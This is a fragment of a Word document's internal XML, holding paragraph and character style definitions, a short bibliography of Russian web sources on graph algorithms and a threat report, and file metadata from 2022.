  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00F22B9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4"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="Подзаголовок Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00F22B9B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4"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00AC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0"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F673F0"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="B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15513"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32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2A2F77"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="280"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000D2725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D2725"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/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0D2725"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af4">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00450514"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00282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82CAE"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003F0EA7"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:contextualSpacing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1F5C0C"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0048597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102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35374D"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0013429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character" w:styleId="af6">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00134290"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af7">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00163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8091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078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6023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9860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980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308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182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3781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socke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igitalocean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s-cert.kaspersky.ru/publications/reports/2018/09/20/threats-posed-by-using-rats-in-ic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ftpdlib.readthedocs.io/en/latest/tutori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{867FAFBB-62C6-4ED2-B6A3-2EC05CB5D219}</b:Guid>
    <b:Title>https://ru.wikipedia.org/wiki/%D0%94%D0%B2%D1%83%D0%B4%D0%BE%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9_%D0%B3%D1%80%D0%B0%D1%84</b:Title>
    <b:InternetSiteTitle>ru.wikipedia.org</b:InternetSiteTitle>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>htt1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{1BC8E028-E9C4-41B5-886B-5DDCD75CC2BA}</b:Guid>
    <b:Title>https://habr.com/ru/post/422009/</b:Title>
    <b:InternetSiteTitle>habr.com</b:InternetSiteTitle>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>htt2</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{77D9495A-B7A3-41D8-9166-6FAE0B80A3B0}</b:Guid>
    <b:Title>https://ru.wikipedia.org/wiki/Венгерский_алгоритм</b:Title>
    <b:InternetSiteTitle>ru.wikipedia.org</b:InternetSiteTitle>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DDC3CCFC-E22A-4DF1-8BD4-5DC7164EA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2785</Words>
  <Characters>15880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Belyaev Max</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <cp:lastPrinted>2022-06-02T10:45:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-02T10:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-02T10:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>